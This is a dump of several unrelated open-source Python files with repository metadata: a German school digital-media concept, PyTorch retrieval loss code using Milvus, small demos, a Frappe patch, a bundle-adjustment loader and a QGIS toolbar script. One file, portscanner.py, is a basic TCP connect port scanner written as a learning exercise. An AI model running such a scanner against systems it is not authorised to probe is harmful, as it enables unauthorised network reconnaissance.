print sum(numbers)
| 16.666667 | 48 | 0.72 |
fceb2a52211da9a8c0aa8ef0042f78ffe7faaac0
| 8,590 |
py
|
Python
|
book/_build/jupyter_execute/docs/001_zielsetzung.py
|
tom-tubeless/wwg-digitales-miteinander
|
d9391046a7ed12b91b538b937993161c67d77d68
|
[
"CC0-1.0"
] | null | null | null |
book/_build/jupyter_execute/docs/001_zielsetzung.py
|
tom-tubeless/wwg-digitales-miteinander
|
d9391046a7ed12b91b538b937993161c67d77d68
|
[
"CC0-1.0"
] | null | null | null |
book/_build/jupyter_execute/docs/001_zielsetzung.py
|
tom-tubeless/wwg-digitales-miteinander
|
d9391046a7ed12b91b538b937993161c67d77d68
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# # Zielsetzung
#
# ## Medien im Wandel
#
# Die Digitalisierung unseres Alltags hat weitreichende Folgen für das Leben und Lernen unserer Schüler:Innen.
# Kontinuierliche Änderungen in der digitalen Medienlandschaft versteht das Wim-Wenders-Gymnasium als Chance, sogenannte neue Medien sinnvoll in den Lernprozess der Schüler:Innen zu integrieren.
# Medien wie Smartphones, elektrische Wiedergabegeräte und Computer werden von einem Großteil der Schüler:Innen täglich vielseitig genutzt.
# Eine zentrale Aufgabe der Schule sollte es sein, diese Medienaffinität der Jugendlichen sinnvoll zu kanalisieren, produktiv zu nutzen und unterstützend zu begleiten.
# Wir wollen unseren Schüler:Innenn eine medienbezogene Reflexions- und Handlungskompetenz vermitteln.
# Sie sollen lernen, die Mediensysteme sicher zu nutzen, kritisch zu bewerten und effektiv als Ressource für ihre individuellen Bildungsbiografien und ihre Identitätsarbeit auszuschöpfen.
# Dazu gehört explizit die Erziehung zu einem digital mündigen Teil der Gesellschaft, der die Regeln im gesellschaftlichen Miteinander nicht nur kennt, sondern auch lebt und schützt.
#
# Die zu vermittelnden Inhalte sind eng mit dem [Medienkompetenzrahmen](https://www.schulministerium.nrw.de/docs/bp/Ministerium/Schulverwaltung/Schulmail/Archiv-2018/180626/Kontext/2018_Medienkompetenzrahmen_NRW.pdf) {cite:ps}`MKR2018` der NRW-Landesregierung verknüpft und als progressive Kompetenz-Ziele ausformuliert über die Schulinternen Lehrpläne der Fächer verteilt.
# Eine besondere Rolle spielt am Wim-Wenders-Gymnasium die Verbindung der Naturwissenschaften mit den Künsten -- Die kreative Nutzung technische und digitaler Medien hat in unserer Schule somit einen großen Stellenwert.
# Beispiele finden sich in den Milestones im Anhang \ref{sec:milestones}
# Ziel ist es, das digitale Miteinander über die Schulgrenzen hinaus aktiv zu Gestalten und dem Ruf gerecht zu werden, eine Schule des 21. Jahrhunderts zu sein.
#
# ## Zeitgemäße Lernkultur
#
# In den letzten Jahren hat sich die Struktur des Lernprozesses der Schüler:Innen verändert.
# Digitale Medien spielen eine wachsende Rolle beim Lehren und Lernen in einer digitalisierten Welt.
# Schüler:Innen recherchieren Fachinhalte im Internet, erstellen Dokumente mit Textverarbeitungsprogrammen und erschließen sich Themen anhand von Computersimulationen.
# Diese Medien stehen neben den „klassischen“ Büchern, Tonträgern und weiteren Beispielen, ersetzten diese aber im Alltag in vielen Bereichen.
# Dieser Veränderung in der Lernkultur soll die Schule Rechnung tragen, indem sie einerseits Möglichkeiten bietet, die Vorteile digitalen Lehrens und Lernens zu nutzen und andererseits Schüler:Innen beim Erlernen dieser Fähigkeiten unterstützt.
# Hier geht es nicht nur um den Umgang mit den einschlägigen Programmen, sondern auch darum, Gefahren im Umgang mit dem Internet und sozialen Netzwerken aufzuzeigen und Schüler:Innenn dazu befähigen diesen begegnen zu können.
# Statt einer Substitution von Medien ist eine Transformation von Kompetenzen mit Hilfe verschiedener Medien gewünscht.
# Es ist Ziel des Wim-Wenders-Gymnasiums, Schüler:Innen medienbezogene Reflexions- und Handlungskompetenz zu vermitteln und sie damit zum kompetenten Umgang mit Medien zu befähigen.
#
# Die Schüler:Innen sollen die Schule als medienkompetente Abiturientinnen und Abiturienten verlassen.
# Die Kernfrage für unsere Arbeit am Konzept für das digitale Miteinander lautet daher: „Welche Kompetenzen sollten medienkompetente Abiturient\*Innen beherrschen, wenn sie von der Schule in den Berufs- bzw. Universitätsalltag entlassen werden?“
# Neben der effizienten Benutzung von „Office-Programmen“, geht es um den vorsichtigen Umgang mit persönlichen Daten (beispielsweise in sozialen Netzen), sowie um die kompetente Nutzung digitaler Medien als Recherche- und Lernressource bis hin zu einer kritischen Reflexion der Medien in ihren politischen, sozialen und wirtschaftlichen Funktionen.
# Typische Unterrichtsfragen sind: Wie recherchiere ich mithilfe digitaler Medien und nutze Suchmaschinen möglichst effizient?
# Welche Medien sind für welches Anliegen geeignet: Wikipedia für die Facharbeit, oder doch lieber ein Buch?
# In Bezug auf das Arbeiten mit den Office-Programmen darf der Fokus nicht nur auf den handwerklichen Fähigkeiten wie der Bedienung der Programme liegen, sondern die Schüler:Innen sollen auch die grundlegenden Techniken wissenschaftlichen Arbeitens lernen (kritische Quellenarbeit, formale Ausgestaltung von Dokumenten, angemessene Präsentationen etc.).
# Ziel ist es ein lebenslanges digital unterfüttertes Lernen zu Fördern.
#
# Mit der Verankerung digitaler Medien im Unterricht handelt das Wim-Wenders-Gymnasium auch im Sinne der Nachhaltigkeit.
# Individuelle Förderung, Übungen, die nach Bedarf bearbeitet werden und wichtige Informationen können effizient geteilt, kooperativ bearbeitet und für alle papierlos zugänglich gemacht werden.
#
# Dem Wim-Wenders-Gymnasium ist es wichtig einen maßvollen Umgang mit Medien zu lehren.
# Studien legen nahe, dass einige digitale Medien ein gewisses Suchtpotential haben {cite:ps}`Rehbein2012` und somit einen Lernprozess negativ beeinflussen können.
# Durch einen geplanten und gezielten Einsatz von „neuen“ Medien gepaart mit dem Einsatz „klassischer“ Medien will das Wim-Wenders-Gymnasium dem entgegen wirken.
# So ist zum Beispiel auf dem Gelände des Wim-Wenders-Gymnasium die Nutzung privater digitaler Endgeräte zu privaten Zwecken verboten.
# Dies soll nicht nur für eine kommunikative salutogene Atmosphäre sorgen, sondern auch einen positiven Einfluss auf die Leistungen der Schüler:Innen haben. {cite:ps}`Beland2016`
# Auch der Anonymisierung innerhalb der Schulgemeinde soll so vorgebeugt werden, gilt sie doch als Nährboden für den Missbrauch digitaler Medien wie zum Beispiel Cybermobbing.
#
# Die Maßnahmen der Schule (vgl. S. \pageref{sec:praevention}) haben folgende Intentionen:
#
# ### Förderung der Empathie
#
# Eine empathische Haltung den Mitmenschen gegenüber, erzielt laut den aktuellen Forschungsergebnissen die stärkste Wirkung bei der Prävention und der Unterbindung von Gewalt sowohl in der virtuellen, als auch in der realen Welt.
#
# ### Förderung der Medienwirkungskompetenz
#
# Die Schüler:Innen des Wim-Wenders-Gymnasiums erwerben ein ausgeprägtes Medienwissen und Fähigkeit zur analytischen, reflektierten und sozialbestimmenden Medienkritik.
#
# ### Aufzeigen prosozialer Handlungspositionen
#
# Mobbing wird unter anderem als Demonstration der Macht ausgeführt. Dieses Verhalten ist adoptiert. Förderung des prosozialen Handelns auf der Klassenebene kann indirekt das Verhalten von Kindern beeinflussen.
#
# ### Förderung des Selbstvertrauens in die eignen Überzeugungen
#
# Einstellungen und Verhalten der Freunde spielt bei der Motivation zur Ausübung von Cybermobbing eine wichtige Rolle.
# Täter mit einem hohen öffentlichen Score können das Verhalten der Gruppe beeinflussen.
# Schüler:Innen, die keine positive Einstellung dem Cybermobbing gegenüber haben, sollten eine Abneigung gegenüber dem Täterverhalten entwickeln.
#
# ### Präventive und Intervenierende Maßnahmen (bei Risikogruppen)
#
# Änderung der Einstellungen und Unterbindung des Zusammenhangs der wahrgenommenen Verhaltenskontrolle und des Cybermobbings.
#
# Das Wim-Wenders-Gymnasium möchte eine Schule sein, die die Schüler:Innen entlang ihrer lebenslangen Lernbiografie fördert, fordert und im positiven Sinne prägt.
# Die Werte und Normen einer salutogenen Schule müssen also auf die digitalen Kompetenzen übertragen werden.
# Grundlage dafür kann eine transparente Kommunikation und demokratische Entscheidungsprozesse sein.
# Die Schule will zur ständigen Evaluation und Optimierung digitale Werkzeuge testen und verwenden.
#
# ## Bezug zu Kernlehrplänen
#
# Die [Kernlehrpläne des Landes Nordrhein-Westfalen](https://www.schulentwicklung.nrw.de/lehrplaene/lehrplannavigator-s-i/) fordern seit 2014 explizit den Einsatz neuer Medien im Unterricht.
# So sieht zum Beispiel der Lehrplan im Fach Kunst den Einsatz von Software zum Ton- und Videoschnitt und von Bildbearbeitungsprogrammen vor.
# Mit Bezug zum besonderen Schwerpunkt des Wim-Wenders-Gymnasiums (Die Verbindung von Kunst und Naturwissenschaften) sind alle Fächer aufgerufen, nach sinnvollen Möglichkeiten im Umgang mit den Medien zu suchen.
# Das Konzept für das digitale Miteinander stellt dafür gemeinsam mit der Lehrplan-Partitur die Grundlage dar.
#
# <!-- ```{bibliography}
# :style: plain
# ``` -->
| 96.516854 | 373 | 0.824563 |
a2165aa6951d3a430dc2edfe07654812be40c3b8
| 12,033 |
py
|
Python
|
solutions/pedestrian_search/webserver/src/utils/metric.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | 1 |
2021-01-11T18:40:22.000Z
|
2021-01-11T18:40:22.000Z
|
solutions/pedestrian_search/webserver/src/utils/metric.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | null | null | null |
solutions/pedestrian_search/webserver/src/utils/metric.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
import numpy as np
import logging
from torch.nn.parameter import Parameter
from torch.autograd import Variable
from milvus import Milvus, IndexType, MetricType, Status
client = Milvus(host='192.168.1.85', port='19666')
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class EMA():
def __init__(self, decay=0.999):
self.decay = decay
self.shadow = {}
def register(self, name, val):
self.shadow[name] = val.cpu().detach()
def get(self, name):
return self.shadow[name]
def update(self, name, x):
assert name in self.shadow
new_average = (1.0 - self.decay) * x.cpu().detach() + self.decay * self.shadow[name]
self.shadow[name] = new_average.clone()
def create_collection(gallery):
param = {'collection_name':'test01', 'dimension':512, 'index_file_size':1024, 'metric_type':MetricType.IP}
status = client.create_collection(param)
ivf_param = {'nlist': 2048}
status = client.create_index('test01', IndexType.IVF_FLAT, ivf_param)
status, inserted_vector_ids = client.insert(collection_name='test01', records=gallery)
#print(len(inserted_vector_ids))
def pairwise_distance(A, B):
"""
Compute distance between points in A and points in B
:param A: (m,n) -m points, each of n dimension. Every row vector is a point, denoted as A(i).
:param B: (k,n) -k points, each of n dimension. Every row vector is a point, denoted as B(j).
:return: Matrix with (m, k). And the ele in (i,j) is the distance between A(i) and B(j)
"""
A_square = torch.sum(A * A, dim=1, keepdim=True)
B_square = torch.sum(B * B, dim=1, keepdim=True)
distance = A_square + B_square.t() - 2 * torch.matmul(A, B.t())
return distance
def one_hot_coding(index, k):
if type(index) is torch.Tensor:
length = len(index)
else:
length = 1
out = torch.zeros((length, k), dtype=torch.int64).cuda()
index = index.reshape((len(index), 1))
out.scatter_(1, index, 1)
return out
# deprecated due to the large memory usage
def constraints_old(features, labels):
distance = pairwise_distance(features, features)
labels_reshape = torch.reshape(labels, (features.shape[0], 1))
labels_dist = labels_reshape - labels_reshape.t()
labels_mask = (labels_dist == 0).float()
# Average loss with each matching pair
num = torch.sum(labels_mask) - features.shape[0]
if num == 0:
con_loss = 0.0
else:
con_loss = torch.sum(distance * labels_mask) / num
return con_loss
def constraints(features, labels):
labels = torch.reshape(labels, (labels.shape[0],1))
con_loss = AverageMeter()
index_dict = {k.item() for k in labels}
for index in index_dict:
labels_mask = (labels == index)
feas = torch.masked_select(features, labels_mask)
feas = feas.view(-1, features.shape[1])
distance = pairwise_distance(feas, feas)
#torch.sqrt_(distance)
num = feas.shape[0] * (feas.shape[0] - 1)
loss = torch.sum(distance) / num
con_loss.update(loss, n = num / 2)
return con_loss.avg
def constraints_loss(data_loader, network, args):
network.eval()
max_size = args.batch_size * len(data_loader)
images_bank = torch.zeros((max_size, args.feature_size)).cuda()
text_bank = torch.zeros((max_size,args.feature_size)).cuda()
labels_bank = torch.zeros(max_size).cuda()
index = 0
con_images = 0.0
con_text = 0.0
with torch.no_grad():
for images, captions, labels, captions_length in data_loader:
images = images.cuda()
captions = captions.cuda()
interval = images.shape[0]
image_embeddings, text_embeddings = network(images, captions, captions_length)
images_bank[index: index + interval] = image_embeddings
text_bank[index: index + interval] = text_embeddings
labels_bank[index: index + interval] = labels
index = index + interval
images_bank = images_bank[:index]
text_bank = text_bank[:index]
labels_bank = labels_bank[:index]
if args.constraints_text:
con_text = constraints(text_bank, labels_bank)
if args.constraints_images:
con_images = constraints(images_bank, labels_bank)
return con_images, con_text
class Loss(nn.Module):
def __init__(self, args):
super(Loss, self).__init__()
self.CMPM = args.CMPM
self.CMPC = args.CMPC
self.epsilon = args.epsilon
self.num_classes = args.num_classes
if args.resume:
checkpoint = torch.load(args.model_path)
self.W = Parameter(checkpoint['W'])
print('=========> Loading in parameter W from pretrained models')
else:
self.W = Parameter(torch.randn(args.feature_size, args.num_classes))
self.init_weight()
def init_weight(self):
nn.init.xavier_uniform_(self.W.data, gain=1)
def compute_cmpc_loss(self, image_embeddings, text_embeddings, labels):
"""
Cross-Modal Projection Classfication loss(CMPC)
:param image_embeddings: Tensor with dtype torch.float32
:param text_embeddings: Tensor with dtype torch.float32
:param labels: Tensor with dtype torch.int32
:return:
"""
criterion = nn.CrossEntropyLoss(reduction='mean')
self.W_norm = self.W / self.W.norm(dim=0)
#labels_onehot = one_hot_coding(labels, self.num_classes).float()
image_norm = image_embeddings / image_embeddings.norm(dim=1, keepdim=True)
text_norm = text_embeddings / text_embeddings.norm(dim=1, keepdim=True)
image_proj_text = torch.sum(image_embeddings * text_norm, dim=1, keepdim=True) * text_norm
text_proj_image = torch.sum(text_embeddings * image_norm, dim=1, keepdim=True) * image_norm
image_logits = torch.matmul(image_proj_text, self.W_norm)
text_logits = torch.matmul(text_proj_image, self.W_norm)
#labels_one_hot = one_hot_coding(labels, num_classes)
'''
ipt_loss = criterion(input=image_logits, target=labels)
tpi_loss = criterion(input=text_logits, target=labels)
cmpc_loss = ipt_loss + tpi_loss
'''
cmpc_loss = criterion(image_logits, labels) + criterion(text_logits, labels)
#cmpc_loss = - (F.log_softmax(image_logits, dim=1) + F.log_softmax(text_logits, dim=1)) * labels_onehot
#cmpc_loss = torch.mean(torch.sum(cmpc_loss, dim=1))
# classification accuracy for observation
image_pred = torch.argmax(image_logits, dim=1)
text_pred = torch.argmax(text_logits, dim=1)
image_precision = torch.mean((image_pred == labels).float())
text_precision = torch.mean((text_pred == labels).float())
return cmpc_loss, image_precision, text_precision
def compute_cmpm_loss(self, image_embeddings, text_embeddings, labels):
"""
Cross-Modal Projection Matching Loss(CMPM)
:param image_embeddings: Tensor with dtype torch.float32
:param text_embeddings: Tensor with dtype torch.float32
:param labels: Tensor with dtype torch.int32
:return:
i2t_loss: cmpm loss for image projected to text
t2i_loss: cmpm loss for text projected to image
pos_avg_sim: average cosine-similarity for positive pairs
neg_avg_sim: averate cosine-similarity for negative pairs
"""
batch_size = image_embeddings.shape[0]
labels_reshape = torch.reshape(labels, (batch_size, 1))
labels_dist = labels_reshape - labels_reshape.t()
labels_mask = (labels_dist == 0)
image_norm = image_embeddings / image_embeddings.norm(dim=1, keepdim=True)
text_norm = text_embeddings / text_embeddings.norm(dim=1, keepdim=True)
image_proj_text = torch.matmul(image_embeddings, text_norm.t())
text_proj_image = torch.matmul(text_embeddings, image_norm.t())
# normalize the true matching distribution
labels_mask_norm = labels_mask.float() / labels_mask.float().norm(dim=1)
i2t_pred = F.softmax(image_proj_text, dim=1)
#i2t_loss = i2t_pred * torch.log((i2t_pred + self.epsilon)/ (labels_mask_norm + self.epsilon))
i2t_loss = i2t_pred * (F.log_softmax(image_proj_text, dim=1) - torch.log(labels_mask_norm + self.epsilon))
t2i_pred = F.softmax(text_proj_image, dim=1)
#t2i_loss = t2i_pred * torch.log((t2i_pred + self.epsilon)/ (labels_mask_norm + self.epsilon))
t2i_loss = t2i_pred * (F.log_softmax(text_proj_image, dim=1) - torch.log(labels_mask_norm + self.epsilon))
cmpm_loss = torch.mean(torch.sum(i2t_loss, dim=1)) + torch.mean(torch.sum(t2i_loss, dim=1))
sim_cos = torch.matmul(image_norm, text_norm.t())
pos_avg_sim = torch.mean(torch.masked_select(sim_cos, labels_mask))
neg_avg_sim = torch.mean(torch.masked_select(sim_cos, labels_mask == 0))
return cmpm_loss, pos_avg_sim, neg_avg_sim
def forward(self, image_embeddings, text_embeddings, labels):
cmpm_loss = 0.0
cmpc_loss = 0.0
image_precision = 0.0
text_precision = 0.0
neg_avg_sim = 0.0
pos_avg_sim =0.0
if self.CMPM:
cmpm_loss, pos_avg_sim, neg_avg_sim = self.compute_cmpm_loss(image_embeddings, text_embeddings, labels)
if self.CMPC:
cmpc_loss, image_precision, text_precision = self.compute_cmpc_loss(image_embeddings, text_embeddings, labels)
loss = cmpm_loss + cmpc_loss
return cmpm_loss, cmpc_loss, loss, image_precision, text_precision, pos_avg_sim, neg_avg_sim
class AverageMeter(object):
"""
Computes and stores the averate and current value
Imported from https://github.com/pytorch/examples/blob/master/imagenet/main.py #L247-262
"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += n * val
self.count += n
self.avg = self.sum / self.count
def compute_topk(query, gallery, target_query, target_gallery, k=[1,10], reverse=False):
result = []
query = query / query.norm(dim=1,keepdim=True)
gallery = gallery / gallery.norm(dim=1,keepdim=True)
#print("query:", query, "size:", query.size())
#print("gallery:", gallery, "size:", gallery.size())
sim_cosine = torch.matmul(query, gallery.t())
#create_collection(gallery.tolist())
search_param = {'nprobe': 16}
status, results = client.search(collection_name='test01', query_records=query.tolist()[:2], top_k=5, params=search_param)
result.extend(topk(sim_cosine, target_gallery, target_query, k=[1,10]))
if reverse:
result.extend(topk(sim_cosine, target_query, target_gallery, k=[1,10], dim=0))
return result
def topk(sim, target_gallery, target_query, k=[1,10], dim=1):
result = []
maxk = max(k)
size_total = len(target_gallery)
_, pred_index = sim.topk(maxk, dim, True, True)
pred_labels = target_gallery[pred_index]
print('pred_labels:', pred_labels)
if dim == 1:
pred_labels = pred_labels.t()
print('pred_labels:', pred_labels)
correct = pred_labels.eq(target_query.view(1,-1).expand_as(pred_labels))
print('correct:', correct)
for topk in k:
#correct_k = torch.sum(correct[:topk]).float()
correct_k = torch.sum(correct[:topk], dim=0)
correct_k = torch.sum(correct_k > 0).float()
result.append(correct_k * 100 / size_total)
return result
| 39.19544 | 200 | 0.648799 |
bfba49096c7692d2b35980349ffd844d144b37b8
| 260 |
py
|
Python
|
02_Python/exceptions.py
|
DaviNakamuraCardoso/Harvard-CS50-Web-Programming
|
afec745eede41f7b294c3ee6ebaff9ac042e5e4c
|
[
"MIT"
] | null | null | null |
02_Python/exceptions.py
|
DaviNakamuraCardoso/Harvard-CS50-Web-Programming
|
afec745eede41f7b294c3ee6ebaff9ac042e5e4c
|
[
"MIT"
] | null | null | null |
02_Python/exceptions.py
|
DaviNakamuraCardoso/Harvard-CS50-Web-Programming
|
afec745eede41f7b294c3ee6ebaff9ac042e5e4c
|
[
"MIT"
] | null | null | null |
import sys
try:
x = int(input("X:"))
y = int(input("Y:"))
except ValueError:
print("Error: invalid input.")
sys.exit(1)
try:
result = x / y
except ZeroDivisionError:
print("Error: Could not divide by 0.")
sys.exit(1)
print(result)
| 17.333333 | 42 | 0.607692 |
78322d4575ef60a29998c49fc307987e022760d3
| 492 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v8_0/move_perpetual_inventory_setting.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v8_0/move_perpetual_inventory_setting.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v8_0/move_perpetual_inventory_setting.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
def execute():
frappe.reload_doctype('Company')
enabled = frappe.db.get_single_value("Accounts Settings", "auto_accounting_for_stock") or 0
for data in frappe.get_all('Company', fields = ["name"]):
doc = frappe.get_doc('Company', data.name)
doc.enable_perpetual_inventory = enabled
doc.db_update()
| 37.846154 | 92 | 0.768293 |
784d84323ab8c5da74c358fca266206b63129f3a
| 1,875 |
py
|
Python
|
code/python/portscanner.py
|
Grasshoppeh/road2oscp
|
a5beb41af4430b2099835db80d6290e3504d0626
|
[
"MIT"
] | null | null | null |
code/python/portscanner.py
|
Grasshoppeh/road2oscp
|
a5beb41af4430b2099835db80d6290e3504d0626
|
[
"MIT"
] | null | null | null |
code/python/portscanner.py
|
Grasshoppeh/road2oscp
|
a5beb41af4430b2099835db80d6290e3504d0626
|
[
"MIT"
] | null | null | null |
#!/bin/python3
__author__ = 'Richard Ellis'
__credits__ = 'Heath Adams'
__version__ = '1.0'
#My first take on a quick port scanning script in python. Goal was the practice the usage of the socket library. I already had previosu knowlegdge of python.
#Areas that could be improved are an argument to
# - scan the search space for ip addresses
# - multiproccessing on the socket_connect
# - using the time library to make it not run everything at once
# - for checking inet_aton grabing the failure execption and exiting? Not sure maybe in that case it better to traceback???
import sys
import socket
import argparse
from datetime import datetime
#Get arguments from the command line
parser = argparse.ArgumentParser()
parser.add_argument("ip", default='127.0.0.1', help='IP you want to scan')
parser.add_argument('-s', '--start', type=int, default=1, help='Port to start scanning from. Default 55')
parser.add_argument('-e', '--end', type=int, default=65535, help='Port to end scanning from. Default 85')
args = parser.parse_args()
if args.start > args.end or args.start < 1 or args.end < 1 or args.start > 65535 or args.end > 65535:
sys.exit('Start/end arguments invalid logic')
#Scan in a given port range and ip
if socket.inet_aton(args.ip):
target = socket.gethostbyname(sys.argv[1])
try:
print("Starting scan")
for port in range(args.start,args.end):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
result = sock.connect_ex((target,port))
if result == 0:
print("OPEN: port {openport} is open".format(openport=port))
sock.close()
print("Scan finished")
except KeyboardInterrupt:
sys.exit("\nExiting program")
except socket.gaierror:
sys.exit('\n Hostname could not be resolved.')
except socket.error:
sys.exit('\nCouldnt connect to server.')
| 37.5 | 157 | 0.719467 |
bd7279f7dcdddd83bc8a0d9881d161c50adc033f
| 147 |
py
|
Python
|
triNum.py
|
mrmayurs4/Hacktoberfest-2020
|
f2bc129bd8574d5870b9595a019bff3baddeaf73
|
[
"MIT"
] | null | null | null |
triNum.py
|
mrmayurs4/Hacktoberfest-2020
|
f2bc129bd8574d5870b9595a019bff3baddeaf73
|
[
"MIT"
] | null | null | null |
triNum.py
|
mrmayurs4/Hacktoberfest-2020
|
f2bc129bd8574d5870b9595a019bff3baddeaf73
|
[
"MIT"
] | null | null | null |
n = int(input("Enther i for ith Triangular number"))
triNum = ((n**2)+n)/2
print ("The {}nt Triangular Number is {}".format(str(n), str(triNum)))
| 49 | 70 | 0.646259 |
e509aa82982c8c6591ee46e853299876de698333
| 362 |
py
|
Python
|
DeepRTS/python/_py_game_arguments.py
|
Yigit-Arisoy/deep-rts
|
a5ed2c29b76789830df9f7075480c7229ccf0f4d
|
[
"MIT"
] | 1 |
2020-01-08T22:20:37.000Z
|
2020-01-08T22:20:37.000Z
|
DeepRTS/python/_py_game_arguments.py
|
Yigit-Arisoy/deep-rts
|
a5ed2c29b76789830df9f7075480c7229ccf0f4d
|
[
"MIT"
] | 1 |
2021-11-11T18:39:56.000Z
|
2021-11-11T22:15:59.000Z
|
DeepRTS/python/_py_game_arguments.py
|
Yigit-Arisoy/deep-rts
|
a5ed2c29b76789830df9f7075480c7229ccf0f4d
|
[
"MIT"
] | null | null | null |
from DeepRTS import python
from DeepRTS import Engine
class GameArguments:
def __init__(
self,
game_map,
n_players,
engine_config,
gui_config
):
self.game_map = game_map
self.n_player = n_players
self.engine_config = engine_config
self.gui_config = gui_config
| 21.294118 | 42 | 0.59116 |
e559c2d3f0ef2f9a97c31a62af4c951e19f364d6
| 2,386 |
py
|
Python
|
research/3d/DeepLM/ba_core/io.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/3d/DeepLM/ba_core/io.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/3d/DeepLM/ba_core/io.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===========================================================================
"""DeepLM io."""
import numpy as np
def load_bal_from_file(filename, feature_dim, camera_dim, point_dim, double=True):
"""load ba data"""
dtype = np.float64 if double else np.float32
with open(filename, 'r') as f:
num_cameras, num_points, num_observations = [int(i) for i in f.readline().strip().split()]
point_indices = []
cam_indices = []
t_camera = np.zeros((num_cameras, camera_dim)).astype(dtype)
t_point = np.zeros((num_points, point_dim)).astype(dtype)
t_feat = np.zeros((num_observations, feature_dim)).astype(dtype)
for i in range(num_observations):
features2d = []
if i % 1000 == 0:
print("\r Load observation {} of {}".format(i, num_observations), end="", flush=True)
cam_idx, point_idx, x, y = f.readline().strip().split()
point_indices.append(int(point_idx))
cam_indices.append(int(cam_idx))
features2d.append(float(x))
features2d.append(float(y))
t_feat[i] = (features2d)
t_point_indices = point_indices
t_cam_indices = cam_indices
for i in range(num_cameras):
camera_paras = []
for _ in range(camera_dim):
camera_para = f.readline().strip().split()[0]
camera_paras.append(float(camera_para))
t_camera[i] = camera_paras
for i in range(num_points):
points3d = []
for _ in range(point_dim):
point = f.readline().strip().split()[0]
points3d.append(float(point))
t_point[i] = points3d
return t_point, t_camera, t_feat, t_point_indices, t_cam_indices
| 39.766667 | 101 | 0.612741 |
009951fbfdb6f0ee94d6da4c7549b09484f8dd68
| 2,298 |
py
|
Python
|
GZP_GTO_QGIS/INSTALLATION/GeoTaskOrganizer/mActionGTOuis.py
|
msgis/swwat-gzp-template
|
080afbe9d49fb34ed60ba45654383d9cfca01e24
|
[
"MIT"
] | 3 |
2019-06-18T15:28:09.000Z
|
2019-07-11T07:31:45.000Z
|
GZP_GTO_QGIS/INSTALLATION/GeoTaskOrganizer/mActionGTOuis.py
|
msgis/swwat-gzp-template
|
080afbe9d49fb34ed60ba45654383d9cfca01e24
|
[
"MIT"
] | 2 |
2019-07-11T14:03:25.000Z
|
2021-02-08T16:14:04.000Z
|
GZP_GTO_QGIS/INSTALLATION/GeoTaskOrganizer/mActionGTOuis.py
|
msgis/swwat-gzp-template
|
080afbe9d49fb34ed60ba45654383d9cfca01e24
|
[
"MIT"
] | 1 |
2019-06-12T11:07:37.000Z
|
2019-06-12T11:07:37.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from PyQt5.QtGui import *
from PyQt5.QtWidgets import QToolBar,QDockWidget
def run(id, gtotool, config, debug):
try:
#read config
toolbars_hideall = config.get('toolbars_hideall',False)
toolbars = config.get('toolbars',[])
menus_hideall = config.get('menus_hideall',False)
menus= config.get('menus',[])
panels_hideall = config.get('panels_hideall',False)
panels = config.get('panels',[])
showstatusbar=True
try:
showstatusbar = config.get('showstatusbar',True)
except:
pass
#references
info = gtotool.info
iface = gtotool.iface
#toolbars
qtoolbars = iface.mainWindow().findChildren(QToolBar)
for toolbar in qtoolbars:
objName = toolbar.objectName()
if debug: info.log("toolbar:", objName,"title:",toolbar.windowTitle())
if objName in toolbars:
toolbar.setHidden(False)
else:
if toolbars_hideall and objName !='mGTOtoolbar': toolbar.setHidden(True)
if objName == 'gtoTB_debug': toolbar.setHidden(False)
#panels
qpanels = iface.mainWindow().findChildren(QDockWidget)
for panel in qpanels:
objName = panel.objectName()
if debug: info.log("panel:",objName)
if objName in panels:
panel.setHidden(False)
else:
if panels_hideall and objName != 'GTODockWidget': panel.setHidden(True)
#restor toolbars in panels
toolbars = panel.findChildren(QToolBar)
for t in toolbars:
t.setHidden(False)
if debug: info.log("toolbar restored:", t.objectName())
#menus
qmenubar = iface.mainWindow().menuBar()
for action in qmenubar.actions():
objName= action.menu().objectName()
if debug: info.log("menu:",objName)
if objName in menus:
action.setVisible(True)
else:
if menus_hideall: action.setVisible(False)
#statusbar
iface.mainWindow().statusBar().setHidden(not showstatusbar)
except Exception as e:
gtotool.info.err(e)
